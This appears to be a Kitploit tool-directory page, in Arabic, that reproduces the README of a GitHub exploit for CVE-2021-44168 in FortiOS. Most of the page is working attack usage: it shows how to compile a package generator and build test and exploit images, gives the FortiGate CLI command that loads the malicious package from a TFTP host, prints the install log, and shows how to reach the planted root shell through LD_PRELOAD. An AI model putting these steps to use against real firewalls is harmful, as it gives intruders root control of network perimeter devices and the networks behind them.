Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44168 — ثغرة تنزيل كود دون التحقق من التكامل في أمر "execute restore src-vis" من FortiOS قبل الإصدار 7.0.3. | Kitploit
أدوات/GitHubGitHub/0xhaggis/cve-2021-44168
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولاتاستغلال الملفات الثنائية
GitHub0xhaggis/cve-2021-44168

CVE-2021-44168

ثغرة تنزيل كود دون التحقق من التكامل في أمر "execute restore src-vis" من FortiOS قبل الإصدار 7.0.3.

عرض المستودع
212منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال لـ CVE-2021-44168

الغرض

استغلال CVE-2021-44168 للحصول على شل على جدار حماية FortiGate وتمكين الوصول إليه عبر حيل LD_PRELOAD التي يتم تنفيذها عند تشغيل بعض أوامر CLI الخاصة بـ FortiGate. تحصل على شل جذر.

الاستخدام

ترجمة:

root@kitploit:~
gcc -o gen_src-vis_pkg_file gen_src-vis_pkg_file.c -lz

تشغيل:

root@kitploit:~
% ./gen_src-vis_pkg_file
./gen_src-vis_pkg_file [ -t | -p ] filename.img
  -t            إنشاء حزمة اختبار، أو
  -p            إنشاء حزمة استغلال.
  filename.img  كتابة إلى هذا الملف.

وضع الاختبار

وضع الاختبار يقوم بإسقاط ملف باسم pwned.txt إلى جذر نظام الملفات الخاص بـ FortiGate. قم بإنشاء حزمة اختبار كالتالي:

root@kitploit:~
% ./gen_src-vis_pkg_file -t test.img
[+] Generaing TEST package
[+] Reading test.tar for insertion into package file test.img
[+] Compressing test.tar (10240 bytes)
[+] Compressed size: 115
[+] Build pkg_header
[+] pkg_header crc32: 0x16a384f1
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xe097e419
[+] obj_header crc32: 0xabdfc3cb
[+] Write pkg_header + obj_header + obj_data > test.img
[+] All done. So long and thanks for all the fish!

وضع الاستغلال

وضع الاستغلال ينشئ حزمة حمولة تقوم بإسقاط شل على FortiGate وتمكينها عبر حيل LD_PRELOAD. لتوليد حزمة الاستغلال، قم بتشغيل الاستغلال كالتالي:

root@kitploit:~
% ./gen_src-vis_pkg_file -p pwn.img
[+] Generaing EXPLOIT package
[+] Reading pwn.tar for insertion into package file pwn.img
[+] Compressing pwn.tar (16465920 bytes)
[+] Compressed size: 6843825
[+] Build pkg_header
[+] pkg_header crc32: 0xd657d879
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xf373554b
[+] obj_header crc32: 0x3a7fdcd7
[+] Write pkg_header + obj_header + obj_data > pwn.img
[+] All done. So long and thanks for all the fish!

استخدام الحزمة الخبيثة للحصول على شل جذر

من CLI إدارة FortiGate:

root@kitploit:~
FortiGate # execute restore src-vis tftp pwn.img 192.168.100.1
This operation will overwrite the current source visibility signatures!
Do you want to continue? (y/n)y

Please wait...

Connect to tftp server 192.168.100.1 ...
######

Get source visibility signatures from tftp server OK.
upd_manual_cid[255]-Updating src-vis plugin
doInstallUpdatePackage[981]-Full obj found for CIDB000
doInstallUpdatePackage[991]-Updating obj CIDB
installUpdateObject[323]-Step 1:Unpack obj 29, Total=1, cur=0
installUpdateObject[352]-Step 2:Prepare temp file for obj 29
installUpdObjRest[637]-Step 5:Backup /etc/cid.tar.gz->/tmp/update.backup
installUpdObjRest[651]-Step 6:Copy new object /tmp/updPiMCON->/etc/cid.tar.gz
installUpdObjRest[731]-Step 7:Validate object
installUpdObjRest[755]-Step 8:Re-initialize using new obj file
installUpdObjRest[767]-Step 9:Delete backup /tmp/update.backup
cid svr 13 req 4
__update_status[1181]-CIDB000 installed successfully
upd_status_save_status[114]-try to save on status file
upd_status_save_status[179]-Wrote status file
upd_manual_cid[284]-Update successful
./../../../../../data2/bfbin/rdate: Cannot create symlink to '/data2/bfbin/busybox'Error exit delayed from previous errorsupd_cfg_extract_unpacked2
upd_cfg_extract_cid_db_version[554]-version=06000000CIDB00000-00000.00000-0101010000
cid could not install sigs: version failed

FortiGate #

في هذه المرحلة سيكون لديك شل يمكن الوصول إليه عبر LD_PRELOAD على أوامر CLI التي تستخدم Linux. إحدى الطرق لتفعيل الشل الذي تم إسقاطه حديثًا:

root@kitploit:~
# fnsysctl ls
/ # 
/ # export PATH=/data2/bfbin:/bin
/ # uname -a
Linux FortiGate 3.2.16 #2 SMP Thu Mar 28 02:54:46 UTC 2019 x86_64 GNU/Linux

شرح الثغرة

يحدد لاحقًا. اقرأ الكود في الوقت الحالي.

تنزيل الأداة